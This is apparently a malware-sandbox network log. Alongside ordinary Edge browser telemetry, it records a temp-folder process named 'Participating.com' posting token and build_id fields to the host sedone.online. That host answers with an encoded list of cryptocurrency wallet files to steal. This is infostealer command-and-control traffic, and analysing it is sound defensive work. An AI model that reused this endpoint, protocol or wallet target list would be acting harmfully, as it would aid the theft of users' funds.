                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 12:47:34 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:33 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.8 | 49808 | 20.110.205.119 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:26 UTC | 1175 | OUT | GET /c.gif?rnd=1734353246082&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e2a72ac00ca647b3b10ce7fbf880fcd7&activityId=e2a72ac00ca647b3b10ce7fbf880fcd7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1
2024-12-16 12:47:27 UTC | 1108 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Location: https://c.bing.com/c.gif?rnd=1734353246082&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e2a72ac00ca647b3b10ce7fbf880fcd7&activityId=e2a72ac00ca647b3b10ce7fbf880fcd7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=EB08ABDCA4E94A6AB90EB65C1E9EB8D9&RedC=c.msn.com&MXFR=162DEC371C56639E2ED8F9601DDC6260
                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Set-Cookie: MUID=162DEC371C56639E2ED8F9601DDC6260; domain=.msn.com; expires=Sat, 10-Jan-2026 12:47:27 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:26 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 49815 | 18.173.219.84 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:26 UTC | 925 | OUT | GET /b?rn=1734353246083&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=162DEC371C56639E2ED8F9601DDC6260&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-16 12:47:27 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Connection: close
Date: Mon, 16 Dec 2024 12:47:27 GMT
Location: /b2?rn=1734353246083&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=162DEC371C56639E2ED8F9601DDC6260&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
set-cookie: UID=1AFead9f10fa09f955f00c51734353247; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
set-cookie: XID=1AFead9f10fa09f955f00c51734353247; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 782a6f1057a52009822f51ac887d693e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK52-P1
X-Amz-Cf-Id: MZ2167b_xh2GZ8Sw3mEusrHaMJMzHfnfDpQKFxt-UA6M6oA_FDIGzg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 49834 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:28 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PH4O89RQIEU37YMYCJ58
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:28 UTC | 331 | OUT | Data Ascii: ------PH4O89RQIEU37YMYCJ58Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------PH4O89RQIEU37YMYCJ58Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------PH4O89RQIEU37YMYCJ58Cont
2024-12-16 12:47:29 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:29 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.8 | 49837 | 18.173.219.84 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:28 UTC | 1012 | OUT | GET /b2?rn=1734353246083&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=162DEC371C56639E2ED8F9601DDC6260&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: UID=1AFead9f10fa09f955f00c51734353247; XID=1AFead9f10fa09f955f00c51734353247
2024-12-16 12:47:29 UTC | 326 | IN | HTTP/1.1 204 No Content
Connection: close
Date: Mon, 16 Dec 2024 12:47:29 GMT
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 782a6f1057a52009822f51ac887d693e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK52-P1
X-Amz-Cf-Id: mW9eFKUT3KwrM2luREI_BOHIrlwqiyHeY0TDdfGz1TWSXo5ZXrTZVw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.8 | 49835 | 20.42.73.31 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:28 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353246080&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 3812
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1
2024-12-16 12:47:28 UTC | 3812 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-16T12:47:26.075Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"locale
2024-12-16 12:47:29 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=fd27791fc8b148cfada5d1fc86e371d1&HASH=fd27&LV=202412&V=4&LU=1734353249134; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:29 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=2cf18602a721450a82e1995923a23c44; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:29 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 3054
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 16 Dec 2024 12:47:28 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 49843 | 20.110.205.119 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:29 UTC | 1271 | OUT | GET /c.gif?rnd=1734353246082&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e2a72ac00ca647b3b10ce7fbf880fcd7&activityId=e2a72ac00ca647b3b10ce7fbf880fcd7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=EB08ABDCA4E94A6AB90EB65C1E9EB8D9&MUID=162DEC371C56639E2ED8F9601DDC6260 HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; SM=T
2024-12-16 12:47:30 UTC | 982 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Set-Cookie: MUID=162DEC371C56639E2ED8F9601DDC6260; domain=.msn.com; expires=Sat, 10-Jan-2026 12:47:29 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                Set-Cookie: SRM_M=162DEC371C56639E2ED8F9601DDC6260; domain=c.msn.com; expires=Sat, 10-Jan-2026 12:47:29 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 23-Dec-2024 12:47:29 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 16-Dec-2024 12:57:29 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:28 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 42
2024-12-16 12:47:30 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 49848 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:30 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----1V3EK68GV3W47QIW4WT2
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:47:30 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 56 33 45 4b 36 38 47 56 33 57 34 37 51 49 57 34 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 31 56 33 45 4b 36 38 47 56 33 57 34 37 51 49 57 34 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 31 56 33 45 4b 36 38 47 56 33 57 34 37 51 49 57 34 57 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------1V3EK68GV3W47QIW4WT2Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------1V3EK68GV3W47QIW4WT2Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------1V3EK68GV3W47QIW4WT2Cont
2024-12-16 12:47:31 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:31 GMT
